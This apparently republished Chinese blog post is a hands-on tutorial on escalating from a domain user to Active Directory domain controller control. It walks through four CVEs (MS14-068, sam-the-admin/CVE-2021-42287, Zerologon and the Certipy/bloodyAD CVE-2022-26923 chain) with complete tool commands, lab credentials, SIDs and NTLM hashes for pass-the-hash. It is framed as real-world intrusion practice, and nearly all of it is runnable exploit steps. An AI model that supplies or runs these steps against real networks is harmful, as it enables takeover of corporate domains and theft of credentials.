当前位置: 首页 > news >正文

Win系统权限提升篇AD内网域控NetLogonADCSPACKDCCVE漏洞

#实战场景:(用户到域控)

通过技术手段拿下内网域环境下某一台服务器权限或某主机上的域用户账号密码后,

与AD域控网络通讯正常的情况下,可直接使用域控提权CVE漏洞进行域控权限提升。

#WIN-AD域控提权-CVE-2014-6324

前提条件:

1、需要域用户账号密码

2、一台主机的管理员权限

whoami /user

net time /domain

net config workstation

ms14-068.exe -u 域成员名@域名 -p 域成员密码 -s 域成员sid -d 域控制器地址

ms14-068.exe -u mary@god.org -p admin!@#45 -s S-1-5-21-1218902331-2157346161-1782232778-1124 -d OWA2010CN-God.god.org

kerberos::list

kerberos::purge

kerberos::ptc "TGT_test02@test.lab.ccache"

dir \\OWA2010CN-God.god.org\C$

psexec \\OWA2010CN-God.god.org cmd

#WIN-AD域控提权-CVE-2021-42287(外网机器是打不到内网域控的)

只需要域用户账号密码

https://github.com/WazeHell/sam-the-admin

python3 sam_the_admin.py god/'webadmin:admin!@#45' -dc-ip 192.168.3.21 -shell

#WIN-AD域控提权-CVE-2020-1472

CVE-2020-1472是继MS17010之后好用的NetLogon特权域控提权漏洞,

影响Windows Server 2008R2至Windows Server 2019的多个版本系统,

只要攻击者能访问到目标域控井且知道域控计算机名即可利用该漏洞.

该漏洞不要求当前计算机在域内,也不要求当前计算机操作系统为Windows.

计算机名:nbtscan -v -h 192.168.3.21

漏洞检测:python3 zerologon_tester.py OWA2010CN-GOD 192.168.3.21

重置空密码:python3 cve-2020-1472-exploit.py OWA2010CN-GOD 192.168.3.21

连接后导出:python3 secretsdump.py god.org/OWA2010CN-GOD\$@192.168.3.21 -no-pass

WMI连接反弹:

python3 wmiexec.py god/administrator@192.168.3.21 -hashes aad3b435b51404eeaad3b435b51404ee:ccef208c6485269c20db2cad21734fe7

#WIN-AD域控提权-CVE-2022-26923

前提条件:(在攻击机运行)

1、一个域内普通账号

2、域内存在证书服务器

Kali添加访问域内信息 /etc/hosts

192.168.3.111 xiaodi.local

192.168.3.111 xiaodi-DC-CA

192.168.3.111 DC.xiaodi.local

获取CA结构名和计算机名

certutil -config - -ping

域内信息

192.168.3.111

test Pass123

xiaodi-DC-CA

DC.xiaodi.local

1申请证书:(Certipy

certipy req 'xiaodi.local/test:Pass123@DC.xiaodi.local' -ca xiaodi-DC-CA -template User -debug

2检测证书(Certipy)

certipy auth -pfx test.pfx

3添加用户:(bloodyAD)

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.111 addComputer pwnmachine 'CVEPassword1234*'

4设置属性:bloodyAD

python3 bloodyAD.py -d xiaodi.local -u test -p 'Pass123' --host 192.168.3.111 setAttribute 'CN=pwnmachine,CN=Computers,DC=xiaodi,DC=local' dNSHostName '["DC.xiaodi.local"]'

5申请证书:(Certipy)

certipy req 'xiaodi.local/pwnmachine$:CVEPassword1234*@192.168.3.111' -template Machine -dc-ip 192.168.3.111 -ca xiaodi-DC-CA -debug

6检测证书:(Certipy)

certipy auth -pfx ./dc.pfx -dc-ip 192.168.3.111

7获取HASH:(impacket)

python3 secretsdump.py 'xiaodi.local/dc$@DC.xiaodi.local' -hashes :b6046c1026699b59301ff66341838df4

8利用HASH:impacket

python3 wmiexec.py xiaodi.local/administrator@192.168.3.111 -hashes aad3b435b51404eeaad3b435b51404ee:e6f01fc9f2a0dc96871220f7787164bd

相关文章:

  • create_react_agent + MCP tools
  • synchronized和ReentrantLock的区别
  • 【论文阅读】Qwen2.5-VL Technical Report
  • Vue 3 九宫格抽奖系统,采用优雅的 UI 设计和流畅的动画效果
  • 打卡Day53
  • 在tensorrt engine中提高推理性能小记
  • 网络安全防护:Session攻击
  • 【python深度学习】Day53对抗生成网络
  • Vue3 + TypeScript + Element Plus 设置表格行背景颜色
  • 第十七章 Linux之大数据定制篇——Shell编程
  • 【C语言】C语言发展历史、特点及其应用
  • SpringBoot源码解析(十二):@ConfigurationProperties配置绑定的底层转换
  • 树莓派智能小车红外避障实验指导书
  • DeepSeek介绍
  • 【Canvas与曲线】使用贝塞尔二次曲线实现平滑过渡的内旋拼合三角形
  • 人工智能学习13-Numpy-规律数组生成
  • Python训练营-Day31-文件的拆分和使用
  • JAVA实战开源项目:在线课程管理系统 (Vue+SpringBoot) 附源码
  • 【大模型分布式训练】多卡解决单卡训练内存不足的问题
  • 【算法】基于中位数和MAD鲁棒平均值计算算法
  • 企业邮箱系统/系统优化的意义
  • 怎么做网站推销产品/百度推广一年大概多少钱
  • 网站建设 seo优化/如何做谷歌seo推广
  • 津南网站建设/爱链工具
  • 怎么查看wordpress版本号/在线seo短视频
  • 山东网站建设哪家便宜/网站应该如何推广